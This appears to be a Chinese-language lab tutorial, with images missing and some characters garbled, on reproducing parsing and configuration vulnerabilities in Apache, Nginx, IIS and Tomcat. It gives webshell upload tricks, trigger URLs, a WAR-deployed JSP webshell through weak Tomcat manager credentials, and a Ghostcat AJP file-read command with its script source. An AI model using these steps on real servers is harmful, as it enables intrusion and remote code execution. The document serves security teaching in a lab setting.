常?組件安全
常?組件
操作系統
windows、linuxWeb 容器 Apache、Tomcat、Nginx、IIS中間件 php、JAVA、Python、perl數據庫 MySQL、Oracle、SQL Server、Access、redis其他組件 phpStudy、Weblogic、JBoss開發框架 s2、thinkphp、vue
關注的問題
1. 組件與漏洞名稱
2. 影響版本3. 漏洞的檢測4. 漏洞的復現5. 漏洞的利?(漏洞場景、?具)6. 修復?案
Apache
Apache 解析漏洞
在1.x 和2.x 的版本中。




上傳png圖片:

上傳一句話木馬:
yjh.php


上傳失敗!

修改文件名:


上傳成功!

蟻劍連接:
http://192.168.10.128/upload/yjh.php.wenxin


getShell成功!
問題原因:
yjh.php.wenxin Apache 會當做PHP ?件來解析。
Apache 從右側向左解析后綴名。
Apache/2.2.25 (Win32) mod_ssl/2.2.25 OpenSSL/0.9.8y PHP/5.2.17
Nginx
Nginx - 空字節漏洞
影響版本:
nginx 0.5.*
nginx 0.6.*
nginx 0.7 <= 0.7.65
nginx 0.8 <= 0.8.37
環境:

運行nginx:





漏洞觸發:
nginx version: nginx/0.7.65
http://192.168.10.128/info.png
http://http://192.168.10.128/info.png%00.php

Nginx - 解析漏洞
解析圖???
與PHP-CGI 有關 cgi.fix_pathinfo
啟動漏洞環境

Docker-compose up -d
192.168.10.130

制作圖片木馬:


上傳:

漏洞觸發:
http://192.168.10.130/uploadfiles/6996efdd38b0767328bdfc1bbe7b932f.png/.php



nginx 版本
nginx/1.17.4

Nginx - ?件路徑解析漏洞 - CVE-2013-4547
影響版本
Nginx 0.8.41 ~ 1.4.3
Nginx 1.5.0 ~ 1.5.7
漏洞環境
登陸docker 環境
漏洞觸發
# 上傳圖???
[1_yjh.jpg ] // .jpg后面有一個空格
http://192.168.16.100:8080/uploadfiles/1_yjh.png
http://192.168.16.100:8080/uploadfiles/1_yjh.png[0x20][0x00].php





其他:

IIS
IIS 6.0 解析漏洞
漏洞環境
Windows 2003
// time.asp
<%=time()%>

分號?件名截斷
time.asp
time.asp;.jpghttp://10.10.10.233:8000/time.asp;.jpg

*.asp ?錄解析錯誤
time.jpg
/1.asp/time.jpg //time.asp--->time.jpg
http://10.10.10.233:8000/1.asp/time.jpg

time.jpg放在1.asp下被當做.asp來解析!
IIS 7.0/7.5 解析漏洞
漏洞環境
Windows 2008
IIS+PHP
漏洞的觸發
http://192.168.16.193:8000/index.png
http://192.168.16.193:8000/index.png/.php

漏洞防護
PHP-CGI
1. cgi.fix_pathinfo = 0
2. 處理映射程序|編輯模塊映射|請求限制|映射|對勾



Tomcat
Tomcat 的安裝與配置
直接解壓
配置環境變量
C:Program FilesJavajdk1.8.0_131
JAVA_HOME:C:Program FilesJavajdk1.8.0_131
Path:%JAVA_HOME%bin;%JAVA_HOME%jrebin;
啟動Tomcat:
C:apache-tomcat-8.5.32bin>startup.bat

nmap 掃描端?
sudo nmap -A -p- 192.168.10.130

開啟Tomcat 管理控制臺manager 遠程訪問
/webApps/manager/META-INF/context.xml

配置管理控制臺賬密
/conf/tomcat-users.xml

弱?令到GetShell
使? tomcat/tomcat ,登錄 Manager App 。
核?思路:通過管理控制臺部署Web 應?,Web 應?就是后?!
將jsp ?件打包
jar cvf jshell.war jshell.jsp
http://192.168.16.193:8080/jshell/jshell.jsp
大馬:jshell.jsp

部署:

大馬密碼:



AJP LFI - CVE-2020-1938
2020年1?6?,國家信息安全漏洞共享平臺(CNVD)收錄了Apache Tomcat?件包含漏洞(CNVD-2020-10487,對應CVE-2020-1938)。攻擊者利?該漏洞,可在未授權的情況下遠程讀取特定?錄下的任意?件。
由于Tomcat 默認開啟的AJP 服務(8009 端?)存在?處?件包含缺陷,攻擊者可構造惡意的請求包進??件包含操作,進?讀取受影響Tomcat 服務器上的Web?錄?件。
影響版本
tomcat 6
tomcat 7 < 7.0.100
tomcat 8 < 8.5.51
tomcat 9 < 9.0.31
漏洞利?
./CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.16.193 -p 8009 -f WEBINF/web.xml
腳本下載地址:
https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi


創建hello.txt,并讀取:


=== Well Done ===